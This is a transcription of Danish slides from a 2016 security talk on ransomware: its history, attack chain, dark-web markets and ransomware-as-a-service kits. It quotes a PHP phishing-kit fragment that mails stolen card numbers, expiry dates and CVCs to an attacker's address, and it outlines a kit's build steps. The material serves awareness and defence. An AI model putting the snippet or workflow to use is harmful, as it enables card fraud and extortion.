IDA-IT-2016-02-09-3 Jacob Herbst
Transcription
IDA-IT-2016-02-09-3 Jacob Herbst
Dagens trusselsbillede – Ransomware – hvordan gør de? Jacob Herbst, CTO, Dubex A/S IDA-IT Gå-hjem-møde, den 9. februar 2016 Dubex A/S Højt specialiserede it-sikkerhedseksperter Managing risk – Enabling growth Eftertragtet arbejdsplads Motiverede medarbejdere Selvfinansierende og privatejet siden 1997 Kvalitet Service Kompetence First mover Konsulent- og sikkerhedsydelser lokalt og globalt Største it-sikkerhedspartner i Danmark 16. bedste arbejdsplads i Danmark 5. bedste ITarbejdsplads i Danmark Hvad skal vi have ud af dette indlæg? • Mine mål med dette indlæg er at give svar på følgende: • Hvad er trends og tendenser i forhold til ransomware angreb? • Hvad driver de angreb som vi oplever? • Et indblik i nogen af de metoder som hackerne anvender • Hvad kan vi gøre? • Disclaimer: Sikkerhed er et meget stort emneområde, som er i konstant forandring. I løbet af de næste 35 minutter, når vi højest at skrabe en lille smule i overfladen. Agenda Hvad er tendenser og drivere? Hvordan har ransomware udviklet sig? Hvordan virker et ransomware angreb? Hvad er Darkweb og hvad kan man finde der? Hvad er fremtidsudsigterne? Hvad vi kan gøre? Angreb - aktuel status Mål Metoder • Målrettede angreb efter fortrolige informationer • Industrispionage • Angreb, der omgår perimeterforsvaret • Økonomisk berigelseskriminalitet • Tyveri af kreditkortinformation • Internetsvindel • Afpresning – Ransomware og DDoS Angribere Spionage Konkurrenter Terrorisme Politiske Kriminelle Cyberkrig Angreb • Angreb mod brugere • Social engineering angreb f.eks. phishing • Angreb via sociale netværk • Webbaserede angreb • Indirekte angreb rettet mod klienter • Indirekte angreb via betroede eksterne tredjeparter • Angreb sløret i krypteret ssl-kommunikation • Sårbarheder og avancerede dag-0-angreb • Hurtig udnyttelse af sårbarheder • Udnyttelse af ukendte sårbarheder – dag-0 • Unik og målrettet malware Interne Drivere bag cyberkriminalitet Automatisering Samarbejde og vidensdeling Anonymitet Profit Betalingsinfrastruktur Avancerede angreb er blevet det normale How Industrial Hackers Monetize the Opportunity • Mange målrettede angreb er stadig forholdsvis simple -- De fleste såkaldt avancerede angreb starter stadig med en e-mail sendt til den rette person med det rette indhold • Cyber kriminalitet er en lukrativ forretning, og det er nemt at starte • Undergrundsmiljø hvor de kriminelle handler med informationer • Metoder som tidligere kun blev brugt i målrettede angreb anvendes nu af almindelige kriminelle • Malware er blevet mere avanceret Source: RSA/CNBC Social Security $1 DDOS as a Service ~$7/hour Credit Card Data $0.25-$60 Medical Record >$50 Bank Account Info >$1000 (depending on account type and balance) Mobile Malware $150 Spam $50/500K emails Exploits $1000-$300K Malware Development $2500 Facebook Account with 15 friends $1 Malware - Udviklingsproces Malware er vidt udbredt og kan fremstilles så det omgår det traditionelle perimeterforsvar og anden beskyttelse Sløring og kvalitetstestning Original Malware Permutationer Kvalitetstestning Afvist hvis detekteret af anti-virus software • Mange forskellige varianter af samme malware fremstilles automatisk forud for et angreb • Kun varianter, der kommer igennem kvalitetstestningen (=omgår antivirus) bruges i selve angrebet • De nye varianter frigives med jævne mellemrum for konstant at være foran antivirus mønster opdateringerne 13.750 nye malware filer i timen Deployering Malware er unikt YOU’RE ABSOLUTELY UNIQUE — JUST LIKE EVERYONE ELSE • “Consistent with some other recent vendor reports, we found that 70 to 90% (depending on the source and organization) of malware samples are unique to a single organization.” • “There’s another lesson here worth stating: Receiving a never-before-seen piece of malware doesn’t mean it was an “advanced” or “targeted” attack. It’s kinda cool to think they handcrafted a highly custom program just for you, but it’s just not true. Get over it and get ready for it. Special snowflakes fall on every backyard.” • “A quick look at the types of malware being used shows they are overwhelmingly opportunistic and relatively shortlived. Even though we looked at data over just a six-month period, 95% of the malware types showed up for less than a month, while four out of five didn’t last beyond a week.” Ransomware sager Hændelser - Danmark Menneskelig fejl kan være årsag til cyberangreb mod kommuner Angreb som det, der har ramt Gribskov kommune, skyldes oftest menneskelige fejl men Danmark kan være i sigtekornet netop nu, mener ekspert. Af Mads Allingstrup / 22. JAN. 2015 KL. 12.27 Kommuner udsat for hackerangreb og afpresning Af Jens Beck Nielsen og Henrik Jensen 22. januar 2015, 22:30 Flere kommuner er nu for første gang blevet angreb af hackere, som kræver penge for at trække sig. En voldsom aktivitet på Gribskov Kommunes drev afslørede mandag eftermiddag, at kommunen for første gang var ramt af cyberangreb. Hackere havde krypteret filer i kommunens systemer og forlangte penge for at slippe kontrollen over dem. Kommunen afviste at betale og politianmeldte sagen, som i går blev sendt videre til Europol. Foreløbig er der ikke noget, der tyder på, at følsomme oplysninger om borgerne er sluppet ud, men kommunaldirektør Holger Spangsberg Kristiansen understreger, at angrebet tages »meget, meget alvorligt.« To kommuner er ramt, men der er højst sandsynligt flere, som der ikke er kendskab til endnu, forklarer Mads Nørgaard Madsen, sikkerhedsekspert og partner i revisionsfirmaet PWC, der har været i kontakt med de ramte kommuner. Ifølge Mads Nørgaard Madsen skyder hackerne med spredehagl og krypterer vilkårlige filer. Og ifølge ham er der altså ikke etale om målrettede forsøg på at stjæle f.eks. personfølsomme oplysninger.»Det handler her om at lave så meget ravage som muligt, så man kan kræve så mange penge som muligt. I tilfældet her har hackerne henvendt sig via mail, og nogle brugere er kommet til at hente en inficeret fil ned. Derfor handler det også om, at der kommer en øget bevidsthed om sikkerheden. Uden at pege fingre kunne det måske have imødegået disse angreb,« siger Mads Nørgaard Madsen. Ond postvirus angriber danske virksomheder Mens Gribskov, Nordfyns og måske endnu flere kommuner netop nu kæmper med at slippe fri af et nedrigt angreb mod deres IT-systemer, er der sansynligvis en eller flere ansatte i kommunerne, der går rundt med røre øren Ransomware-angreb skyldes nemlig oftest menneskelige fejl, hvor folk kommer til hente en fil, de ikke skulle have hentet, eller klikker på et link eller en vedhæftet fil i en mail, der viser sig at være inficeret. Sådan lyder vurderingen fra direktør fra sikkerhedsorganisationen DK-Cert, Shehzad Ahmad, der så sent som i sidste uge stod bag en rapport om danskernes IT-sikkerhed, hvor Ransomware specifikt var nævnt som et stigende problem. Ofte vedhæftede filer - Man kan ikke udelukke, at dette er et målrettet angreb, men det vi normalt ser er, at det et menneske, der selv sætter processen i gang. Det kan være en person i en regnskabsafdeling, der har klikket på en tilsendt opgørelse, eller en person, der har klikket på et link i en mail. Ransomware er et af de mest nedrige typer af angreb, fordi den skadelige kode aktivt forsøger at 'kapre' brugerens computer og kræver løsepenge for at slippe den fri igen. De ekstra avancerede typer af ransomware krypterer sågar brugerens filer, eller bestemte filtyper, fx Excel-ark med en meget hård kryptering, der ikke let kan brydes. Herefter kræver bagmændene løsepenge for at låse computeren op - men selv om man betaler, er det langt fra altid, at de faktisk holder deres løfte og sender nøglen, så man kan få filerne fri. http://www.dr.dk/nyheder/viden/tech/menneskelig-fejlkan-vaere-aarsag-til-cyberangreb-mod-kommuner Mandag d. 28. september 2015, kl. 12.20 / Thomas Breinstrup PostDanmark har politianmeldt virus, som foregiver at komme fra postvæsenet, men som låser folks filer og kræver løsepenge. En særdeles ondsindet computervirus, som udgiver sig for at komme fra postvæsenet, spreder sig i Danmark og koder filer, så man ikke længere har adgang til dem. http://www.b.dk/nationalt/kommuner-udsat-for-hackerangreb-og-afpresning PostDanmark advarer på sin forside mod den falske besked, som mange danskere har modtaget, og som rummer en farlig virus. Sager i medierne Ransomware - Manglende patching førte til ransomware - Tre måneder efter hackerangrebet er der stadig eftervirkninger af det digitale indbrud og ekstraarbejde i bogholderiet. - Løsesummen lød på omkring 3.000 kroner, hvilket var tilpas lavt, men kommunikationen med hackerne trak i langdrag. De endte med at trække stikket på hele det gamle it-setup i stedet. - Nu handler det derfor også om at forberede sig på nye trusler. - »Man tror jo ikke, at det sker for en selv. Men tro ikke, at det ikke sker for dig. Nu er det ikke længere et spørgsmål om, hvem der bliver hacket, men hvornår man bliver det.« Sager i medierne Målrettet Udlandet… “Between April 2014 and June 2015, the IC3 received 992 CryptoWall-related complaints, with victims reporting losses totaling over $18 million.” – FBI Security Bulletin, June 2015 Ransomware Evolution • Clearly, ransomware attacks have increased in numbers over the last 5 years • Many security reports talk about the sophistication and complexity of individual attacks • The general public is left with the impression that we are faced with a new threat that is very difficult or impossible to prevent Udviklingen af ransomware – lidt historie Cyber afpresning • Cyber afpresning er online kriminalitet, der involverer et angreb eller trussel om angreb mod en person eller virksomhed, kombineret med et krav om betailing for at stoppe angrebet Cyber extorsion DDos • Cyber pengeafpresning kan ske på flere måde kryptere data og holde den som gidsel, stjæle data og truende eksponering, nægte adgang til data, angribe systemer så de bliver utilgængelige Ransomware Blackmail Volumetric: Flooding Encrytion Ransomware Computational Asymmetric: Consuming CPU cycles Locker Ransomware Stateful Asymmetric: Abusing memory Vulnerability-based: Exploiting software vulnerabilities Blended DDoS: Combination of multiple attack vectors Release information Ransomware History - AIDS • The first known ransomware was the 1989 "AIDS" trojan (also known as "PC Cyborg") written by Joseph Popp. • PC CYBORG (AIDS Disk) • Emerged in 1989. • Distributed on floppy disks • Installed from Trojan software • Lay dormant to allow time for propagation • Used operating basic encryption and operating system quirks to “scramble” and hide files • Demanded a “License Payment” to be sent via cheque to a post office box in Panama • Not very successful • Technology was lagging behind the idea Ransomware History – 1990s – 2000s • Malware continued to develop 1990s – 2000s • Identity theft • Phishing scams, stealing passwords • Bot Nets – Networks of compromised PCs • Adware • Ransomware 1990s-2000s • Very small percent of Malware! • Too complicated, how to get money? • Too risky, how to stay hidden? • Too weak, how to “Denial of Service” an uncontrolled PC? (CC) BitDefender España (2010) Source: https://www.flickr.com/photos/bitdefenderes/4292753852 • Occasional “fake” ransom, or Anti Virus, easily defeated / removed • Occasional “locker” that affected boot process, easily defeated / removed • 2005: PGPCoder Trojan – 1024 RSA key, collects money via EGOLD Source: http://www.acma.gov.au/~/media/mediacomms/Social%20Media/Images/Ransomware%20Screenshot%20jpg.jpg Ransomware History – 1990s – 2000s • The ransomware concept dates back to 1989 • In 2010, something changed… • In 2012, something changed, a lot! • Technology has caught up to the idea! • Step 1: Idea! Ransom money from people! • Step 2: Use technology to enable the idea! • Step 3: Profit… • CTB-Locker stands for ‘Curve-Tor-Bitcoin‘- in reference to core technologies: • Curve - Strong encryption aka Elliptic Curve Encryption, an extremely strong form of encryption based on number theory • Tor - Anonymity aka The Onion Router network, an anonymized form of the Dark Interne • Bitcoin – aka Untraceable crypto-cash payments the virtual currency extorted from victims of the ransomware (Invented 2009 by Satoshi Nakamoto) Google search trends “ransomware” searches 2008 to 2015 Malware types - 2005 - 2015 Percentage of new families of misleading apps, fake AV, locker ransomware and crypto ransomware identified between 2005 and 2015 Kilde: Symantec, The evolution of ransomware, august 2015 Reveton - Locker • In 2012, ransomware worm known as Reveton began to spread • It is also known as "police trojan" • Its payload displays a warning from a law enforcement agency • Claiming that the computer had been used for illegal activities, such as downloading pirated software, promoting terrorism, copyright etc. • The warning informs the user that to unlock their system they would have to pay a fine • To increase the illusion that the computer is being tracked by law enforcement, the screen also displays the computer's IP address and footage from a computer's webcam Lockers Hvad er Crypto Ransomware? • Crypto Ransomware tager ens data som gidsel • Crypto Ransomware krypterer ens data, og tilbyder at sælge dig nøglen til dekryptering • Indtil for et års tid siden var de fleste crypto ransomware-angreb temmelig harmløse, da den anvendte kryptering nemt kunne fjernes • Med Cryptolocker, Torrentlocker, CTBLocker o.lign. er dette dog ændret … Infektion Malware downloader crypto malware Data bliver krypteret Besked om betaling af løsesum inden udløb af deadline Betaling af løsesum i Bitcoins via TOR Evolution (examples) Evolution of GPCode’s encryption Evolution of Command and Control • GPCode 2004 • Used one byte encryption key, easily defeated • Electronic payments • GPCode (2004) • No C&C (C2) Server, just “did its thing” • Contact malware producer via email for unlock code • GPCode.ac (June 2005) • Implemented RSA Public Key Cryptography (PKI) • Very weak key (56bit RSA modulus = 7 bit symmetric key) • GPCode.ad (April 2006) • Longer RSA keys but still poor PKI implementation • GPCode.ag (June 2006) • Finally, a strong RSA key (660 bit = ~60 bit symmetric) • Cracked by Kaspersky, probably a coding error in .ag • GPCode.ak (June 2008) • Properly implemented 1024 bit RSA key • Failed due to implementation of wrong “cipher” • RC4, vulnerable to cryptanalysis • GPCode.ax (December 2010) – A copycat… • Unbreakable encryption • … but still can be stopped (it has flaws) • Reveton (2012) • Doesn’t encrypt but uses C2 server for ‘unlock’ • Cryptolocker (2013) • Uses C2 server, to retrieve RSA public key (much more secure) • Pseudo Random “Domain Generation Algorithm” (DGA) to avoid easy takedowns (contacts garbage URLs: xxgrradvvzcfyx.biz) • Cryptowall (2014) • Uses C2 server on TOR – hidden and anonymous network! • Improved DGA to make takedown even harder Ransomware 2013/2014 September 2013 December 2013 CryptoLocker - first versions appear to have been posted September 2013 • Usually enters the company by email. • If a user clicks on the executable, it starts immediately scanning network drives, renames all the files & folders and encrypts them. Locker – first copycat software emerged in December 2013 • $150 to get the key, with money being sent to a Perfect Money or QIWI Visa Virtual Card number. CryptoLocker 2.0 – a new and improved version of CryptoLocker was found in December 2013 • CryptoLocker 2.0 was written using C# while the original was in C++. • Tor and Bitcoin used for anonymity and 2048-bit encryption. • The latest variant is not detected by anti-virus or firewall. April 2014 CryptoWall – rebranded from CryptoDefense in April 2014 • Exploited a Java vulnerability. • Malicious advertisements on domains belonging to Disney, Facebook, The Guardian newspaper and many others led people to sites that were CryptoWall infected and encrypted their drives. • According to an August 27 report from Dell SecureWorks Counter Threat Unit (CTU): “CTU researchers consider CryptoWall to be the largest and most destructive ransomware threat on the Internet as of this publication, and they expect this threat to continue growing.” • More than 600,000 systems were infected between mid-March and August 24, with 5.25 billion files being encrypted. 1,683 victims (0.27%) paid a total $1,101,900 in ransom. Nearly 2/3 paid $500, but the amounts ranged from $200 to $10,000. CryptorBit – a new ransomware discovered in December 2013 • CryptorBit corrupts the first 1024 bytes of any data file it finds. • Can bypass Group Policy settings put in place to defend against this type of ransomware infection. • Social engineering used to get end users to install the ransomware using such devices as a fake flash update or a rogue antivirus product. • Tor and Bitcoin again used for a ransom payment. • Also installs crypto-coin mining software that uses the victim’s computer to mine digital currency. July 2014 August 2014 Cryptoblocker – new ransomware variant emerged in July 201414 • only encrypt files <100MB and will skip anything in Windows or Program Files.15 • It uses AES rather than RSA encryption. SynoLocker – appeared in August 201411 • This one attacked Synology NAS devices. SynoLocker encrypted files one by one. • Payment was in Bitcoins and again Tor was used for anonymity. CTB-Locker (Curve-Tor-Bitcoin Locker) – discovered midsummer 2014 • First infections were mainly in Russia. The developers were thought to be from an eastern European country. Ransomware 2014/2015 December 2014 January 2015 February 2015 OphionLocker – surprise! Another ransomware released during the holidays, December 2014 • ECC (elliptic curve cryptography) public-key encryption. • 3 days to pay the ransom or the private key will be deleted. Pclock – greets the New Year, January 2015 by miming CryptoLocker17 • Files in a user’s profile are encrypted. • Volume shadow copies are deleted and disabled. • 72-hour countdown timer to pay 1 bitcoin in ransom. March 2015 … September 2015 TeslaCrypt – a new CryptoWall variant surfaced in February 2015 • Targets popular video game files such as Call of Duty, MineCraft, World of Warcraft, and Steam. VaultCrypt – pretended to be customer support in February 2015 • First circulated in Russia. • Uses Windows batch files and open source GnuPG privacy software for file encryption. CryptoWall 2.0 – ransomware goes on steroids in January 2015 • Delivered via email attachments, malicious pdf files and various exploit kits. • Encrypts the user’s data, until a ransom is paid for the decryption key. • Uses TOR to obfuscate the C&C (Command & Control) channel. • Incorporates anti-vm and anti-emulation checks to hamper identification via sandboxes. • Has the ability to run 64-bit code directly from its 32-bit dropper. It can switch the processor execution context from 32 bit to 64 bit. CryptoWall 3.0 – a new version appeared March 2015 • I2P network communication. • Uses exploit kits to gain privilege escalation on the system. • Disables many security features on a target system. October 2015 November 2015 LowLevel04 – this file-encrypting ransomware greeted us in October 2015 • Also known as the Onion TrojanRansom • Spreads via brute force attacks on machines with Remote Desktop or Terminal Services • Encrypts files using AES encryption but the encryption key itself is RSA encrypted Chimera – November 2015 • The hackers will publish the encrypted files on the Internet if the victim doesn’t pay! CryptoWall 4.0 - 6 months later, in September 2015, a new variant is on the loose • The most important change from CryptoWall 3.0 to 4.0 is that it re-encrypts filenames of the encrypted files, making it more difficult to decipher which files need to be recovered (filename scrambling) • Obliterates restore points • Improved network security evasion Ransomware angreb Typisk forløb for et Ransomware angreb Phishing angreb En række brugere modtager phising-mail Angreb Bruger åbner vedlagt fil eller tilgår link Malware Download & Kontakt Udveksling af nøgler Kryptering af data Visning af afpresning (Betaling) (Oplåsning af filer) Brugerens maskine inficeres med malware Crypto ransomware downloaded Udveksling af public / private key nøgler til kryptering Filerne på den ramte computer bliver krypteret Offeret vises besked med deadline og løsesum Offeret betaler løsesum via Tor netværket med Bitcoins Offeret modtager nøgle til dekryptering af data Malware kontakter Command & Contol Server Cryptolocker • Widely known variant of ransomware • Distributed either as an attachment to a malicious e-mail, or is propagated using the Gameover ZeuS botnet • Began September 2013 / Rose to prominence in late 2013 • Encrypts certain types of files stored on local drives using RSA public-key cryptography • The private key stored only on the malware's control servers and it is impossible to recover files without a key • Offers to decrypt the data if a $300 ransom payment is made by a stated deadline. Ransom increases after deadline. • Threatens to delete the private key if the deadline passes. • Goal is monetary via Bitcoin • Dell SecureWorks estimates that CryptoLocker has infected 250,000 victims. The average payout is $300 each 1 million dollars a day. • $27 million in ransom in first 2 months (FBI) • Defeated in early June 2014 when the Gameover botnet was knocked out in a joint effort by various government agencies and security firms • Decryption keys available for victims at www.decryptcryptolocker.com Filename and Extensions Encrypted .3fr .7z* .ai* .apk .arw .avi .bar .bay .bc6 .bc7 .big .bik .bkf .bkp .bsa .cas .cdr .cer .cfr .cr2 .crt .crw .css .csv .das .db, .db* .dcr .der .dmp .dng .doc .docx .dwg .dxg .epk .eps .erf .esm .ff, .ff* .flv .fos .fpk .fsh .gdb .gho .hkx .itl .itm .iwd .iwi .jpe .jpg .js, .js* .kdb .kdc .kf, .kf* .lbf .lrf .ltx .lvl .m2, .m2* .m3u .m4a .map .mdb .mdf .mef .mlx .mov .mp4 .ncf .nrw .ntl .odb .odc .odm .odp .ods .odt .orf .p12 .p7b .p7c .pak .pdd .pdf .pef .pem .pfx .png .ppt .pptx .psd .psk .pst .ptx .py, .py* .qdf .qic .r3d .raf .rar .raw .rb, .rb* .re4 .rim .rtf .rw2 .rwl .sav .sb, .sb* .sid .sie .sis .slm .snx .sql .sr2 .srf .srw .sum .svg .t12 .t13 .tax .tor .txt .upk .vcf .vdf .vpk .vtf .w3x .wb2 .wma .wmo .wmv .wpd .wps .x3f .xf, .xf8 .xlk .xls .xlsx .xxx .zip TeslaCrypt Who pays the ransom? Police department paid to decrypt images and word documents In the Australia, a Townsville sex shop paid $1,058 to ransomware attackers. FBI’s Advice on Ransomware? Just Pay The Ransom. “The ransomware is that good,” “To be honest, we often advise people just to pay the ransom.” “The easiest thing may be to just pay the ransom,” “The amount of money made by these criminals is enormous and that’s because the overwhelming majority of institutions just pay the ransom.” “Most ransomware scammers are good to their word, You do get your access back.” Joseph Bonavolonta, Assistant Special Agent in Charge of FBI’s CYBER and Counter intelligence Program, Boston https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/ How many pay? • It is surprising that approx. 9.7% of the respondents claim to have been victims of some sort of ransomware. This figure is at least twice as high as the one we were expecting, judging from the scarce and quite speculative previous literature. Most of the ransomware victims seemed to have chosen not to pay the ransom, but a very high percentage of them indeed complied and sent the money to the cyber criminals. This percentage seems to be around 41% for CryptoLocker and approx. 30% for other strands of ransomware (Icepol/Reveton, and many others). This is at least 10 times more than the last previous estimation by Symantec of around a 3% of paying victims (a previous one by the Dell SecureWorks CTU research team put this figure at 0.4%). Data from a Jan 2014 survey by University of Kent http://www.cybersec.kent.ac.uk/Survey2.pdf Cryptolocker Mastermind • According to the FBI, losses are “more than $100 million.” • Bogachev is identified as a leader of a cyber gang of criminals based in Russia and Ukraine that is responsible both GameOver Zeus and Cryptolocker. • Evgeniy Mikhailovich Bogachev • Age 30 • Anapa, Russia • Nickname “Slavik” • Indicted for conspiracy, computer hacking, wire fraud, bank fraud, and money laundering Image source: FBI Et angreb… Dubex Security Analytics Center • Overvågning af logfiler og alarmer fra bl.a.: • Firewalls • IDS/IPS systemer • Webscanning • Servere (Windows, Unix, databaser, web-servere, Active Directory m.m.) • Lidt statistik fra 2015: • Behandling af ”direkte” data fra over 10.000 enheder – indirekte fra mange flere via logs fra firewall, IDS/IPS m.m. • Opsamling og analyse af mere end 12 billioner loglinjer / hændelser • Manuel gennemgang af mere end 3,5 mio. korrelerende alarmer • Over 500 kvalificerede alarmer sendt ud til vores kunder Typiske observationer Interne systemer med malware/trojanske heste Phishing-angreb Ransomware Angreb mod web-servere – sårbarheder, SQL injection, Ransomware og deface Bruteforce password cracking Scanning efter SIP services Mistænkelig trafik Uautoriseret trafik Andet – skanninger Aktuel Ransomware Eksempel på phishing mail • Slutbruger modtager phising mail med link til falsk hjemmeside • Siden er ”beskyttet” med CAPTCHA formentlig for at beskytte mod automatisk analyse Fil download • Slutbrugeren downloader derefter automatisk en ZIP fil der hedder ”forsendelse_20310.zip” • Filen indeholder reelt en EXE fil, som har fået tilknyttet et PDF logo for at ligne en PDF fil Sandbox analyse • Sandbox er en overvåget kopi af vores klient miljø, hvor malware kan køres og observeres, men vil ikke forårsage skade på selve systemet • Sandbox bruges til dynamisk malware analyse og adfærd baseret detektion Analyse af ondsindet fil Ændring af mail opsætning Autorun tilføjelse & sløring af filen Kopiering til %windir% kataloget Unik ikke kendt fil Sletning af shadow kopier Tilgang til ”malware” domæne Etablering af bagdør Opslag på egen DNS Server Virus bliver kun langsomt kendt af antivirus softwaren En anden lidt nyere variant – også unik… Krypterede filer Instruktion i betaling – med hjælp til Bitcoins via Youtube Bitcoin adressen er unik TOR - Kombination af flere ”mixes” • Målsætning: Etablering af en infrastruktur, der ikke er sårbar over for trafikanalyse • Koncept: Kombination af mixes og proxies • Anvender public-key til etablering af forbindelser • Anvender symmetriske nøgler til kommunikation • Samme koncept som kendes fra SSL/TLS proxies • Anvendelse af flere mixes for at sikre et varieret netværk • Mixes (blandere) • Modtager krypteret input fra forskellige afsendere • De-kryptering og videresendelse sker tilfældigt • En iagttager kan ikke se, hvilket output der svarer til hvilket input • Blot en enkelt server fungerer korrekt og ikke er kompromitteret vil anonymiteten være i behold • Ulempe: Dyr og langsom public key kryptering A B A C B C C B C A B A ??? Umuligt at afgøre hvilken meddelelse der kommer fra hvilken afsender Hvordan kommer man på Tor netværket? What is the Dark Web used for? (2015) TOP 5 Guns, bullets and weapons Booom ? Drugs Need a Drivers license ? Stepstones and rooted servers RDP, VNC, NX you name it.. Remote Desktop Access Bots and Botnets Zeus Botnet for only $7.56 Access via proxy, socks, and to loaders and phishing.. The Dark Forums. Hacking the hackers Inside many of the folders were files like “css.gif” …and it was not an image! Behind the codes - Hackers hacking hackers.. $zaz = 'reszult@yahoo.com'; PSW : $theAccountPW … CardHolder : $chold CardNumber : $cnum ExpiryDate : $exp CVC : $cvv $subject = "RZ # $date # $time"; $headers = "From: VbV Full Info<EMAIL-REMOVED@yahoo.fr>"; $headers .= $_POST['eMailAdd']."\n"; mail($zaz,$subject,$log,$headers); Dropping files Virus maker kits for free (backdoored) TOX – Free Ransomware Toolkit Ransomware as a service. TOX – Free Ransomware Toolkit • 'Tox' Offers Free build-your-own Ransomware Malware Toolkit. • Tox is completely free to use. • One dark web hacker has released this for anyone to download and set up their own ransomware for free. • Tox, which runs on TOR, requires not much technical skills to use. • It is designed in such a way that almost anyone can easily deploy ransomware in three simple steps. • Once a user register with the site, follow these three simple steps to creating your own malware: • Type a desired ransom amount you want to ask victims for. • Provide an additional note in the "Cause", the message that will alert victims that they are being held hostage to a piece of malware. • Finally, you are prompted to fill out a captcha, and click "Create". "This process creates an executable of about 2MB that is disguised as a .scr file. Then the Tox [users] distribute and install as they see fit. The Tox site (runs on the TOR network) will track the installs and profit. To withdraw funds, you need only supply a receiving Bitcoin address.“ - McAfee explains.. RaaS - Next generation ”Ransomware as a service” Cryptolocker/CTB-Locker/CryptoWall etc.. 4.61299511 Bitcoins ~= 10.000DKK Kilde: http://malware.dontneedcoffee.com Cryptolocker/CTB-Locker/CryptoWall etc.. Countrys D a t e http://malware.dontneedcoffee.com Cryptolocker/CTB-Locker/CryptoWall etc.. Kilde: http://malware.dontneedcoffee.com When sharing becomes too much… • In mid-August Turkish security group Otku Sen published open source code for ransomware “Hidden Tear” on github • Hidden Tear uses AES encryption and can evade common AV platforms • Otku Sen also published a short video demonstrating how ransomware worked. While this may be helpful for some, there are significant risks. Hidden tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent. • … but • Not everyone on the internet obey this warning • Trend Micro discovered a hacked website in Paraguay • Distributing ransomware detected as RANSOM_CRYPTEAR.B. • Ransomware was created using a modified Hidden Tear code http://blog.trendmicro.rsvp1.com/trendlabs-security-intelligence/a-case-of-too-much-informationransomware-code-shared-publicly-for-educational-purposes-used-maliciously-anyway http://www.trendmicro.rsvp1.com/vinfo/us/threat-encyclopedia/malware/ransom_cryptear.b Hvad er udviklingen omkring Ransomware? (1/2) Aktuel status og tendenser • Aktuelle data viser, at næsten 70% af hændelser rammer små og mellemstore virksomheder, efterfulgt af store virksomheder og private – dog er der formentlig et stort antal mørke tal i statistikken • Flere forskellige filtyper end tidligere bliver ramt – dette for at ramme flere samt ramme særlige filtyper med stor værdi for offeret – fx filer med gemte spil hos gamere og CAD-tegninger i en ingeniørvirksomhed eller tegnestue • Krypto-ransomware er blevet mere virksomhedsrettet – tidligere var det primært rettet mod private, men nyere udgaver går efter ”professionelle” filtyper, netværksdrev (fx CryptoFortress) og kræver en højere løsesum • Ransomware med ”netværksorm” funktionalitet dvs. spredning internt i virksomhederne til alle servere og klienter – potentiale for meget større skade og afpresning af større beløb • Tyveri af data med efterfølgende afpresning under trussel om offentliggørelse på af personlige og følsomme data på Internettet • Kriminelle (Cyber mafia) vil målrettet angribe konsulent virksomheder og myndigheder med ransomware og afpresse store beløb fra organisationer, der ikke ønsker deres forretning forstyrret eller deres intellektuelle ejendom kompromitteret • De fleste krypto-ransomware kalder sig CryptoLocker – simpelthen for at bruge det ”brand” navn som Cryptelocker har fået opbygget Hvad er udviklingen omkring Ransomware? (2/2) Aktuel status og tendenser • Filnavne krypteres så det bliver mere vanskeligt at se hvad der er blevet krypteret. Unik krypteringsnøgle for hver fil • Krypto-ransomware er gået "freemium." Afkod et par filer gratis for at overbevise ofrene om, at de rent faktisk får adgang til deres data, hvis de betaler • ”Offline” kryptering dvs. krypteringen kan starte uden klienten har Internet adgang • Nyere Cryptolocker sletter Volule Shadow kopier (Windows indbyggede backup funktion), således at offeret ikke kan genskabe data den vej igennem • Nye sovende og slørede ransomware varianter der i skjul krypterer data • Tillader stadig adgang til data • Der ventes indtil en backup er foretaget (så backuppen også indeholder krypterede data). • Derefter fjernes krypteringsnøglen og der kræves en (meget stor) løsesum • Ransomware-as-a-service hostet på TOR-netværket og brug af Bitcoin til løsepenge betaling gør det muligt nemt at starte som cyber kriminel Ransomware attacks doubled in 2015 Over half (54%) of all malware targeting UK users in 2015 contained some form of ransomware. Ransom32: Javascript-only Ransomware-as-a-Service (RaaS) • Fully developed in JavaScript, HTML and CSS using NW.js (http://nwjs.io/) • Potentially allows for multi-platform infections after repackaging for Linux and MacOS X • Do not confuse Java and JavaScript • Java - object oriented programming language, originally developed by Sun and now owned by Oracle • JavaScript - object oriented client-side All you need to get your own customized ransomware is a scripting language that is implemented in the Bitcoin address to send your earnings to browser • NW.js bundle node.js, standard JavaScript scripts, and Chromium into a single executable • Chrome executes and launches the JavaScript scripts • The malware package is a self-extracting RAR file of 22MB which expands to over 67MB • NW.js is a legitimate framework so antivirus signature coverage very bad • No administrative rights necessary. • Runs under the security context of the user Kilder: http://blog.emsisoft.com/2016/01/01/meet-ransom32-the-first-javascript-ransomware/ http://www.computerworld.com/article/3018972/security/ransom32-first-of-its-kind-javascript-based-ransomware-spotted-in-the-wild.html Ransom32 - Unwrapping the behemoth • Automatically unpack using script language implemented in WinRAR • Execute the “chrome.exe” file contained in the archive • “chrome” contains a copy of the GPL license agreement. • “chrome.exe” is a packaged NW.js application and contains the actual malware code as well as the framework required to run the malware. • “ffmpegsumo.dll”, “nw.pak”, “icudtl.dat” and “locales” contain data that are required by the NW.js framework to function properly. • “rundll32.exe” is a renamed copy of the Tor client. • “s.exe” is a renamed copy of Optimum X Shortcut, a utility to create and manipulate Desktop and start menu shortcuts. • “g” contains the malware’s configuration information as configured in the web interface. • “msgbox.vbs” is a small script that displays a customizable popup message and is used to display the configured message box. • “u.vbs” is a small script that enumerates, and deletes all files and folders in a given directory. The content of the Ransom32 SFX archive The “g” file contains the malware’s configuration formatted as JSON Ransom32 Files with the following file extensions are being targeted: *.jpg, *.jpeg, *.raw, *.tif, *.gif, *.png, *.bmp, *.3dm, *.max, *.accdb, *.db, *.dbf, *.mdb, *.pdb, *.sql, *.*sav*, *.*spv*, *.*grle*, *.*mlx*, *.*sv5*, *.*game*, *.*slot*, *.dwg, *.dxf, *.c, *.cpp, *.cs, *.h, *.php, *.asp, *.rb, *.java, *.jar, *.class, *.aaf, *.aep, *.aepx, *.plb, *.prel, *.prproj, *.aet, *.ppj, *.psd, *.indd, *.indl, *.indt, *.indb, *.inx, *.idml, *.pmd, *.xqx, *.xqx, *.ai, *.eps, *.ps, *.svg, *.swf, *.fla, *.as3, *.as, *.txt, *.doc, *.dot, *.docx, *.docm, *.dotx, *.dotm, *.docb, *.rtf, *.wpd, *.wps, *.msg, *.pdf, *.xls, *.xlt, *.xlm, *.xlsx, *.xlsm, *.xltx, *.xltm, *.xlsb, *.xla, *.xlam, *.xll, *.xlw, *.ppt, *.pot, *.pps, *.pptx, *.pptm, *.potx, 